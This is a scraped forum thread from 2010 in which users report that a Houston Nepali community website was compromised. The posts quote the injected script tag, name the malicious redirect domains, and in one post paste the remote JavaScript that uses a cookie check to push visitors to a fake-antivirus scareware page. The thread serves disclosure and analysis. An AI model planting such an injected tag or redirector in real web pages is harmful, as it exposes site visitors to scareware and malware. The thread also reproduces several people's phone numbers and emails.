[VIEWED 9681
TIMES]
|
SAVE! for ease of future access.
|
|
|
Saajha
Please log in to subscribe to Saajha's postings.
Posted on 08-19-10 12:05
PM
Reply
[Subscribe]
|
Login in to Rate this Post:
0
?
|
|
There's some malicious script embedded within www.houstonnepalese.org site . This script, upon execution, redirects browsers to some malware housing site. I tried sending an email to admin@houstonnepalese.org , but it bounced back. Technical details of permanent failure: Google tried to deliver your message, but it was rejected by the recipient domain. We recommend contacting the other email provider for further information about the cause of this error. The error that the other server returned was: 554 554 5.7.1 <admin@houstonnepalese.org>: Recipient address rejected: Access denied (state 14). ----- Original message -----Can someone pass this info to the appropriate website admin(s)? They should remove the following from their source code: <script src="http://whereisdudescars.com/js2.php"></script>Thanks! ~@~
|
|
|
|
MillionDollars
Please log in to subscribe to MillionDollars's postings.
Posted on 08-19-10 12:09
PM [Snapshot: 11]
Reply
[Subscribe]
|
Login in to Rate this Post:
0
?
|
|
[Disallowed String for - ] language=JavaScript type=text/javascript> [Disallowed String for - ] type=text/javascript> Contacts | | 6776 Southwest Freeway, Suite 450 | Houston, TX 77074 | | T: (713) 773-4348 | | F: (713) 773-1948 | | NAH Emergency Contacts: 1. Gyanshor Shrestha, 832-816-6448, gyanshor@yahoo.com 2. Rupak Rauniar, 713-436-3677, rrauniar@yahoo.com 3. Chej Gurung, 832-526-8750, grgchej@yahoo.com |
| | | | Fill this form out if you want to subscribe to our newsgroup or have any other comments.
|
|
|
|
pyaradeshbasiharu
Please log in to subscribe to pyaradeshbasiharu's postings.
Posted on 08-19-10 12:27
PM [Snapshot: 24]
Reply
[Subscribe]
|
Login in to Rate this Post:
0
?
|
|
use FF or chrome while Browsing this Site..Google's Safe Browsing API Flags this Site as Hosting/Redirecting to download Scare ware/fake-av.However this Site doesn't seem to host the Exploits.
|
|
|
terobaaje
Please log in to subscribe to terobaaje's postings.
Posted on 08-19-10 12:31
PM [Snapshot: 49]
Reply
[Subscribe]
|
Login in to Rate this Post:
0
?
|
|
|
|
|
Saajha
Please log in to subscribe to Saajha's postings.
Posted on 08-19-10 12:42
PM [Snapshot: 57]
Reply
[Subscribe]
|
Login in to Rate this Post:
0
?
|
|
I just spoke with someone and passed the info. Thanks - MillionDollars! @pyara -- the site isn't hosting the exploit; it's got the redirector that takes your browser to the site that does: <script src="http://whereisdudescars.com/js2.php"></script>
Do the view source, and look at the bottom of the page; you should see the above script. whereisdudescars.com is the site that houses the fakeAV stuff.
~@~
|
|
|
pyaradeshbasiharu
Please log in to subscribe to pyaradeshbasiharu's postings.
Posted on 08-19-10 1:01
PM [Snapshot: 72]
Reply
[Subscribe]
|
Login in to Rate this Post:
0
?
|
|
@saajha..It's a Multiple redirect, Seems as if the Actual Landing Point is the Following URL http://www4.checkpc95.co.cc/p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXpWYxGlqZm%2BVlQ%3D%3D-It triggers the Fake-AV/Scare ware.
This is the Source-code from http://whereisdudescars.com
function sec(conn,v,ex){ var exdate=new Date(); exdate.setDate(exdate.getDate()+ex); document.cookie=conn+"="+escape(v)+";expires="+exdate.toGMTString(); } function gec(conn){ if (document.cookie.length>0){ cs=document.cookie.indexOf(conn+"="); if (cs!=-1){cs=cs+conn.length+1;ce=document.cookie.indexOf(";",cs);if (ce==-1) ce=document.cookie.length;return unescape(document.cookie.substring(cs,ce));} } return ""; } var n=gec("xornopxor"); if (n==""){ sec("xornopxor","1",20); var u="http://www4.checkpc95.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXpWYxGlqZm%2BVlQ%3D%3D"; window.top.location.replace(u);
..Neverthless whoz Life treating You.!!
|
|
|
Duracell
Please log in to subscribe to Duracell's postings.
Posted on 08-19-10 1:04
PM [Snapshot: 79]
Reply
[Subscribe]
|
Login in to Rate this Post:
0
?
|
|
I just opened this on my work computer. Does anyone know if this stays on my computer or how to get rid of this?
|
|